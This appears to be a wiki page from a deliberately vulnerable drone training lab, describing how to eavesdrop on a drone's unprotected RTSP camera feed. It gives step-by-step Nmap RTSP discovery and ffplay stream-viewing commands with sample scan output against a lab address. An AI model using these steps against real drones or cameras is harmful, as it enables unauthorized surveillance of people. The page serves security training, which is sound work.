Camera Feed Eavesdropping - nicholasaleks/Damn-Vulnerable-Drone GitHub Wiki

Intercepting unprotected video streams from a drone’s onboard camera via RTSP


Description

In this scenario, an attacker intercepts the real-time video feed from a drone's camera. By leveraging insecure RTSP (Real-Time Streaming Protocol) streams, the attacker can gain unauthorized access to the video footage, which can then be used for surveillance or to gather sensitive information.

⚠️ Solution Guide

Step 1

Install ffplay if it is not already available on your Kali system. On Kali and other Debian-based systems, ffplay ships in the ffmpeg package.

sudo apt install ffmpeg

Step 2

Use Nmap to identify RTSP streams exposed by the drone.

nmap 10.13.0.3 --script "rtsp*"

You should see output similar to:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 20:39 EDT
Nmap scan report for 10.13.0.3
Host is up (0.000092s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE
554/tcp  open  rtsp
|_rtsp-methods: OPTIONS, DESCRIBE, ANNOUNCE, GET_PARAMETER, PAUSE, PLAY, RECORD, SETUP, SET_PARAMETER, TEARDOWN
| rtsp-url-brute: 
|   discovered: 
|_    rtsp://10.13.0.3/stream1
3000/tcp open  ppp

Step 3

Use ffplay to connect and view the drone’s video stream.

ffplay rtsp://10.13.0.3:554/stream1